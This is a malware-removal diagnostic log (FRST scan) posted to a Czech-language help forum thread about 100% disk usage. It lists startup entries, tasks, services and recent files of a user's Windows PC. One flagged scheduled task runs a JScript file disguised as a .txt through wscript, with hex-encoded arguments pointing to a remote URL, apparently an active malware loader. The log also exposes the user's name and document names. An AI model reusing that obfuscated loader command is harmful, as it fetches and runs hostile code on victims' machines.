HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\RunOnce: [Uninstall C:\Users\Alžbeta\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Alžbeta\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64"
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\RunOnce: [Application Restart #2] => C:\Users\Alžbeta\AppData\Local\SweetLabs App Platform\Engine\ServiceHostApp.exe --disable-internal-flash --noerrdialogs --no-message-box --disable-extensions --disable-web-security --disable-web-reso (the data entry has 587 more characters).
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\RunOnce: [Application Restart #1] => C:\Users\Alžbeta\AppData\Local\SweetLabs App Platform\Engine\ServiceHostApp.exe --disable-internal-flash --noerrdialogs --no-message-box --disable-extensions --disable-web-security --disable-web-reso (the data entry has 587 more characters).
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\MountPoints2: {045bcc95-b53d-11e8-8285-2c600c36c058} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\MountPoints2: {ae5fc0d7-fe1a-11e7-8278-2c600c36c058} - "E:\AutoRun.exe"
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\MountPoints2: {d4408456-5472-11e9-8295-2c600c36c058} - "E:\HiSuiteDownLoader.exe"
HKLM\...\Print\Monitors\EPSON L355 Series 64MonitorBE: C:\Windows\system32\E_YLMI4E.DLL [120320 2014-07-29] (Microsoft Windows Hardware Compatibility Publisher -> SEIKO EPSON CORPORATION)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\89.0.4389.90\Installer\chrmstp.exe [2021-03-18] (Google LLC -> Google LLC)
Startup: C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Odoslanie do aplikácie OneNote.lnk [2017-05-16]
ShortcutTarget: Odoslanie do aplikácie OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (No File)
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0AB5BB00-9FA2-4C0C-980F-27944E85E3DF} - System32\Tasks\UMonitor Task => C:\Windows\SysWOW64\UMonit64.exe [53248 2014-02-26] () [File not signed]
Task: {11C14BF1-8D4C-40D2-8C46-B6C328B89D88} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [100608 2014-08-30] (Acer Incorporated -> )
Task: {2E6EE475-0322-49BE-B15C-EC543E559279} - System32\Tasks\Launch Manager => C:\Program Files\Acer\Acer Launch Manager\LMLauncher.exe [439016 2014-09-11] (Acer Incorporated -> Acer Incorporate)
Task: {3881294B-FAD8-482E-8F49-13746D3C778C} - System32\Tasks\BacKGroundAgent => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [65824 2017-09-26] (Acer Incorporated -> Acer Incorporated)
Task: {57E10253-3E88-4476-A515-E067829A97AE} - System32\Tasks\Mozilla\Firefox Default Browser Agent E7CF176E110C211B => C:\Program Files (x86)\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-25] (Mozilla Corporation -> Mozilla Foundation)
Task: {7B9D5FB0-3F73-4B71-8752-21BAFB8716B6} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe <==== ATTENTION
Task: {7D8B1308-013D-4F23-9832-017945D9FAA6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [376496 2014-01-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {854DCC3B-0EEC-4CA3-9663-35E0EEABD69D} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [1626328 2014-01-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {8DCE4F65-8B58-463C-8F88-96BD3BEFE504} - System32\Tasks\Recovery Management\Notification => C:\Program Files\Acer\Acer Recovery Management\Notification\Notification.exe [490728 2014-06-17] (Acer Incorporated -> Acer Incorporated)
Task: {905729D0-9D40-4808-887B-D825D291B340} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe
Task: {A1B74B9B-A81D-4A47-85DC-84740FAB1E9E} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616832 2019-09-04] (Apple Inc. -> Apple Inc.)
Task: {AEB1D8A5-1517-43E4-BE2E-461B54085B6F} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
Task: {AF48B60B-77CD-43BB-A274-95951EF57CA4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-30] (Google Inc -> Google Inc.)
Task: {B83BFA13-66B3-4AB0-807C-E063810C4D77} - System32\Tasks\Quick Access Quick Launcher => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe
Task: {BE1610AB-F081-474D-BD18-849EC583A734} - System32\Tasks\Software Update Application => C:\ProgramData\OEM\UpgradeTool\ListCheck.exe [474344 2014-06-09] (Acer Incorporated -> Acer Incorporated)
Task: {D16404B6-F5CD-44B1-9344-A72615079EB1} - System32\Tasks\Opera scheduled Autoupdate 1513103063 => C:\Users\Alžbeta\AppData\Local\Programs\Opera\launcher.exe [1793688 2021-03-11] (Opera Software AS -> Opera Software)
Task: {D65B0E1E-40C3-4B34-B7B9-13051E2901BE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [376496 2014-01-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {DFCB0507-7D66-4C4C-BA4E-49D464ACFEE3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-30] (Google Inc -> Google Inc.)
Task: {F50A3388-AAED-4597-A11F-D36F90F62F32} - System32\Tasks\Chromium manit => "wscript.exe" "C:\ProgramData\{1212D771-9850-5DB7-1E96-C3F584D4483B}\cala.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d314539362d4333463538344434343833427d5c6c6566696361" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d314539362d4333463538344434343833427d5c6c6974616d656c" "//B" "//E:jscript" "--IsErIk" -> "C:\ProgramData\{1212D771-9850-5DB7-1E96-C3F584D4483B}\cala.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d314539362d4333463538344434343833427d5c6c6566696361" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d (the data entry has 84 more characters). <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [121704 2011-08-31] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [132968 2011-08-31] (Apple Inc. -> Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{2FCAE69B-59C9-4966-AA3A-6515D315D60C}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4D5BD52C-CB48-4CBB-AA4D-5560078C82AD}: [DhcpNameServer] 192.168.1.1

Edge:
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Alžbeta\AppData\Local\Microsoft\Edge\User Data\Default [2021-03-25]

FireFox:
========
FF DefaultProfile: iuolivhx.default
FF ProfilePath: C:\Users\Alžbeta\AppData\Roaming\Mozilla\Firefox\Profiles\iuolivhx.default [2021-03-24]
FF Homepage: Mozilla\Firefox\Profiles\iuolivhx.default -> chrome://branding/locale/browserconfig.properties
FF Extension: (No Name) - C:\Program Files (x86)\McAfee\SiteAdvisor\e10ssaffplg.xpi [not found]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
FF Extension: (McAfee® WebAdvisor) - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi [2021-03-16] [UpdateUrl:hxxps://sadownload.mcafee.com/products/SA/Win/xpi/webadvisor/update.json]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-05-14] (Foxit Corporation -> )
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-05-14] (Foxit Corporation -> )
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\eset_security_config_overlay.js [2021-03-30]

Chrome:
=======
CHR Profile: C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default [2021-03-30]
CHR Notifications: Default -> hxxps://bylinke.sk; hxxps://drive.google.com; hxxps://mail.naturpack.sk; hxxps://meet.google.com; hxxps://www.exasoft.cz; hxxps://www.freefilm.sk
CHR Extension: (Dokumenty) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-12-31]
CHR Extension: (Disk Google) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-26]
CHR Extension: (YouTube) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-12-31]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2021-03-22]
CHR Extension: (Dokumenty Google v režime offline) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-03-16]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-02-01]
CHR Extension: (tTab) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\oonbcpdabjcggcklopgbdagbfnkhbgbe [2019-11-10]
CHR Extension: (Gmail) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-26]
CHR Extension: (Chrome Media Router) - C:\Users\Alžbeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-03-16]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe]
CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM-x32\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe]

Opera:
=======
OPR Profile: C:\Users\Alžbeta\AppData\Roaming\Opera Software\Opera Stable [2021-03-28]
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=o ... utEncoding}
OPR Extension: (Rich Hints Agent) - C:\Users\Alžbeta\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2021-02-01]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ekrn; C:\Program Files\ESET\ESET Security\ekrn.exe [2595360 2020-10-29] (ESET, spol. s r.o. -> ESET)
R3 ekrnEpfw; C:\Program Files\ESET\ESET Security\ekrn.exe [2595360 2020-10-29] (ESET, spol. s r.o. -> ESET)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (SEIKO EPSON Corporation -> Seiko Epson Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-28] (Intel(R) Corporation) [File not signed]
R2 KerioMailServer; C:\MailServer\mailserver.exe [38268608 2018-04-29] (Kerio Technologies, Inc. -> Kerio Technologies Inc.)
R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [469736 2014-09-11] (Acer Incorporated -> Acer Incorporate)
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [958216 2021-02-07] (McAfee, LLC -> McAfee, LLC)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [254512 2012-04-24] (CyberLink -> )
R2 rtop; C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe [297288 2018-04-10] (Byte Technologies LLC -> Byte Technologies LLC.) <==== ATTENTION
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13216272 2020-03-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
S3 ePowerSvc; "C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe" [X]
S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]
S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]
S3 QASvc; "C:\Program Files\Acer\Acer Quick Access\QASvc.exe" [X]
S3 RMSvc; "C:\Program Files\Acer\Acer Quick Access\RMSvc.exe" [X]
S3 UEIPSvc; "C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 btmaux; C:\Windows\system32\DRIVERS\btmaux.sys [140600 2014-03-26] (Motorola Solutions Inc. -> Motorola Solutions, Inc.)
S3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1424184 2014-04-22] (Motorola Solutions Inc. -> Motorola Solutions, Inc.)
R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [160992 2020-10-26] (ESET, spol. s r.o. -> ESET)
R0 edevmon; C:\Windows\System32\DRIVERS\edevmon.sys [109360 2020-10-26] (ESET, spol. s r.o. -> ESET)
S0 eelam; C:\Windows\System32\DRIVERS\eelam.sys [15288 2020-09-17] (Microsoft Windows Early Launch Anti-malware Publisher -> ESET)
R1 ehdrv; C:\Windows\system32\DRIVERS\ehdrv.sys [190464 2020-10-26] (ESET, spol. s r.o. -> ESET)
R2 ekbdflt; C:\Windows\system32\DRIVERS\ekbdflt.sys [43720 2020-10-26] (ESET, spol. s r.o. -> ESET)
R1 epfw; C:\Windows\system32\DRIVERS\epfw.sys [70048 2020-10-26] (ESET, spol. s r.o. -> ESET)
R1 epfwwfp; C:\Windows\system32\DRIVERS\epfwwfp.sys [107784 2020-10-26] (ESET, spol. s r.o. -> ESET)
S3 GeneStor; C:\Windows\System32\drivers\GeneStor.sys [111336 2014-04-28] (GENESYS LOGIC, INC. -> GenesysLogic)
S3 iaLPSS_UART2; C:\Windows\System32\drivers\iaLPSS_UART2.sys [143864 2014-06-11] (Intel Corporation - Software and Firmware Products -> Intel Corporation)
R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-07-18] (Acer Incorporated -> Acer Incorporated)
R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [14680 2013-07-18] (Acer Incorporated -> Acer Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-03-29 13:26 - 2021-03-29 13:31 - 000000000 ____D C:\AdwCleaner
2021-03-29 13:09 - 2021-03-30 11:50 - 000000000 ____D C:\FRST
2021-03-29 13:07 - 2021-03-29 13:26 - 000000000 ____D C:\install
2021-03-29 13:06 - 2021-03-29 13:06 - 002298368 _____ (Farbar) C:\Users\Alžbeta\Downloads\FRST64.exe
2021-03-29 13:01 - 2021-03-29 13:03 - 000000000 ____D C:\Users\Alžbeta\AppData\Roaming\AnyDesk
2021-03-29 13:00 - 2021-03-29 13:01 - 003189712 _____ (philandro Software GmbH) C:\Users\Alžbeta\Downloads\support.exe
2021-03-29 11:22 - 2021-03-29 11:22 - 000063794 _____ C:\Users\Alžbeta\Downloads\životopis,final.pdf
2021-03-29 11:05 - 2021-03-29 11:05 - 000732744 _____ C:\Users\Alžbeta\Downloads\Maruška a Betka.xlsx
2021-03-26 15:47 - 2021-03-26 15:48 - 000243932 _____ C:\Users\Alžbeta\Downloads\kvartalny-vykaz-1-2020-obaly (1).pdf
2021-03-26 12:32 - 2021-03-26 12:32 - 000248574 _____ C:\Users\Alžbeta\Downloads\kvartalny-vykaz-1-2021-obaly (2).pdf
2021-03-26 12:31 - 2021-03-26 12:31 - 000244842 _____ C:\Users\Alžbeta\Downloads\kvartalny-vykaz-1-2021-obaly (1).pdf
2021-03-24 12:09 - 2021-03-24 12:09 - 000063787 _____ C:\Users\Alžbeta\Downloads\životopis, aktual.pdf
2021-03-22 13:07 - 2021-03-22 13:07 - 000013571 _____ C:\Users\Alžbeta\Downloads\vratene adresy emailuve k hromadnemu mailu.xlsx
2021-03-18 20:20 - 2021-03-18 20:20 - 000000000 ____D C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Zoom
2021-03-18 20:19 - 2021-03-18 20:20 - 000000000 ____D C:\Users\Alžbeta\AppData\Roaming\Zoom
2021-03-18 11:10 - 2021-03-18 11:10 - 000895266 _____ C:\Users\Alžbeta\Downloads\Guidance - EEE, BaA 2021.pdf
2021-03-18 11:10 - 2021-03-18 11:10 - 000820778 _____ C:\Users\Alžbeta\Downloads\Guidance - PACKAGING 2021.pdf
2021-03-18 11:10 - 2021-03-18 11:10 - 000677513 _____ C:\Users\Alžbeta\Downloads\Guidance - NON-PACKAGING PRODUCTS 2021.pdf
2021-03-18 11:02 - 2021-03-30 11:17 - 000009713 _____ C:\Users\Alžbeta\Desktop\plán zaúčania.xlsx
2021-03-16 15:05 - 2021-03-16 15:05 - 000248801 _____ C:\Users\Alžbeta\Downloads\kvartalny-vykaz-1-2021-obaly.pdf
2021-03-16 14:53 - 2021-03-16 14:53 - 000243856 _____ C:\Users\Alžbeta\Downloads\kvartalny-vykaz-1-2020-obaly.pdf
2021-03-16 13:47 - 2021-03-16 13:47 - 001941834 _____ C:\Users\Alžbeta\Downloads\zmluvy (2).zip
2021-03-15 12:03 - 2021-03-15 12:04 - 000002333 _____ C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
2021-03-12 21:02 - 2021-02-13 04:26 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2021-03-12 21:02 - 2021-02-13 04:12 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2021-03-12 21:00 - 2021-02-13 04:24 - 000073728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2021-03-12 20:59 - 2021-02-13 04:47 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2021-03-12 20:51 - 2021-03-12 20:51 - 000009810 _____ C:\Users\Alžbeta\Downloads\ing ed.xlsx
2021-03-12 20:51 - 2021-03-12 20:51 - 000009810 _____ C:\Users\Alžbeta\Downloads\ing ed (1).xlsx
2021-03-12 11:02 - 2021-03-12 11:02 - 004163132 _____ C:\Users\Alžbeta\Downloads\Zmluva o spolupráci.pdf
2021-03-12 11:02 - 2021-03-12 11:02 - 000620705 _____ C:\Users\Alžbeta\Downloads\zplnomocneni.pdf
2021-03-09 13:05 - 2021-03-09 13:05 - 000251496 _____ C:\Users\Alžbeta\Downloads\0348_210309120104_001.pdf
2021-03-08 13:05 - 2021-03-08 13:05 - 008413907 _____ C:\Users\Alžbeta\Downloads\nove zmluvy.zip
2021-03-01 14:47 - 2021-03-01 14:47 - 000629229 _____ C:\Users\Alžbeta\Downloads\doc02092520210301124246.pdf
2021-03-01 11:37 - 2021-03-01 11:38 - 000120950 _____ C:\Users\Alžbeta\Downloads\V_1482812005_2_20210226_C1_P0.pdf

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-03-30 11:49 - 2017-06-27 16:58 - 000017082 _____ C:\Windows\system32\perfh01B.dat
2021-03-30 11:49 - 2017-06-27 16:58 - 000006132 _____ C:\Windows\system32\perfc01B.dat
2021-03-30 11:49 - 2014-03-18 12:03 - 000870760 _____ C:\Windows\system32\PerfStringBackup.INI
2021-03-30 11:49 - 2013-08-22 15:36 - 000000000 ____D C:\Windows\Inf
2021-03-30 11:47 - 2016-11-09 16:13 - 000003594 _____ C:\Windows\system32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2055909378-1137603550-79369489-1001
2021-03-30 11:42 - 2016-11-09 16:15 - 000000000 ___RD C:\Users\Alžbeta\OneDrive
2021-03-30 11:41 - 2020-03-26 10:48 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-03-30 11:41 - 2013-08-22 16:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-03-30 11:40 - 2013-08-22 15:25 - 000262144 ___SH C:\Windows\system32\config\BBI
2021-03-30 11:37 - 2014-09-30 12:47 - 000000000 ____D C:\Program Files\Acer
2021-03-30 11:37 - 2014-09-30 12:40 - 000000000 ____D C:\Program Files (x86)\Acer
2021-03-30 10:29 - 2016-11-18 16:44 - 006104576 ___SH C:\Users\Alžbeta\Desktop\Thumbs.db
2021-03-30 10:04 - 2016-11-09 16:21 - 000003974 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{2D25E5BB-08D3-4A55-9814-E736B113F726}
2021-03-29 14:19 - 2020-04-07 19:54 - 000002350 _____ C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams.lnk
2021-03-29 14:19 - 2020-04-07 19:54 - 000002342 _____ C:\Users\Alžbeta\Desktop\Microsoft Teams.lnk
2021-03-29 13:31 - 2018-05-22 10:32 - 000000000 ____D C:\MailServer
2021-03-29 13:01 - 2019-01-09 23:07 - 000000000 ____D C:\Users\Alžbeta\Documents\Súbory Outlooku
2021-03-29 12:29 - 2016-11-09 21:31 - 002444288 ___SH C:\Users\Alžbeta\Downloads\Thumbs.db
2021-03-29 12:22 - 2016-11-09 16:23 - 000000000 ____D C:\Users\Alžbeta\AppData\Local\CrashDumps
2021-03-29 11:54 - 2016-11-09 16:07 - 000000000 ____D C:\Users\Alžbeta\AppData\Local\Packages
2021-03-28 16:58 - 2020-10-02 21:18 - 000000000 ____D C:\Users\Alžbeta\Desktop\Diplomovka
2021-03-24 20:33 - 2016-11-27 16:33 - 000000000 ____D C:\Users\Alžbeta\AppData\LocalLow\Mozilla
2021-03-24 14:08 - 2019-03-13 19:29 - 000000000 ____D C:\ProgramData\Mozilla
2021-03-24 13:34 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\rescache
2021-03-23 14:04 - 2020-09-17 09:27 - 000000000 ____D C:\Users\Alžbeta\Desktop\BETKA-najnovšia verzia
2021-03-18 15:38 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\AppReadiness
2021-03-18 10:33 - 2017-12-30 23:57 - 000002260 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-03-18 10:33 - 2017-12-30 23:57 - 000002219 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-03-18 10:33 - 2017-12-30 23:57 - 000002219 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2021-03-15 19:56 - 2020-12-01 22:03 - 000004080 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1513103063
2021-03-15 19:56 - 2020-05-15 15:02 - 000001449 _____ C:\Users\Alžbeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Prehliadač Opera.lnk
2021-03-15 19:21 - 2013-08-22 16:44 - 000491328 _____ C:\Windows\system32\FNTCACHE.DAT
2021-03-15 16:40 - 2013-08-22 17:36 - 000000000 ___RD C:\Windows\ToastData
2021-03-15 16:39 - 2017-03-05 18:15 - 000000000 ____D C:\Windows\system32\MRT
2021-03-15 16:39 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\SysWOW64\setup
2021-03-15 16:39 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\setup
2021-03-15 16:13 - 2017-03-05 18:14 - 131005360 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2021-03-15 16:04 - 2020-12-18 10:00 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2021-03-15 12:14 - 2018-06-27 17:21 - 000003176 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2055909378-1137603550-79369489-1001
2021-03-15 11:26 - 2013-08-22 17:20 - 000000000 ____D C:\Windows\CbsTemp
2021-03-11 11:55 - 2020-11-02 11:15 - 000000000 ____D C:\Users\Alžbeta\Desktop\5. ročník
2021-03-10 14:07 - 2017-12-14 12:21 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2021-03-10 10:52 - 2013-08-22 15:25 - 000000199 _____ C:\Windows\win.ini

==================== Files in the root of some directories ========

2017-12-12 20:21 - 2017-12-12 21:16 - 000213112 _____ () C:\Users\Alžbeta\AppData\Roaming\DMGR_1N1I1F1S1T1I0M1F1Q2Y1I1P1B0C1F1Q1P.txt
2019-04-25 12:15 - 2020-03-21 17:43 - 000000038 _____ () C:\Users\Alžbeta\AppData\Roaming\WB.CFG
2019-03-02 21:36 - 2019-03-02 21:36 - 000000000 _____ () C:\Users\Alžbeta\AppData\Local\BIT4B2F.tmp
2017-12-31 01:18 - 2017-12-31 01:18 - 000000068 _____ () C:\Users\Alžbeta\AppData\Local\PLHDzBxzBx

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2021-03-24 13:37
==================== End of FRST.txt ========================

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118195
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Disk 100%

#7 Příspěvek od Rudy »

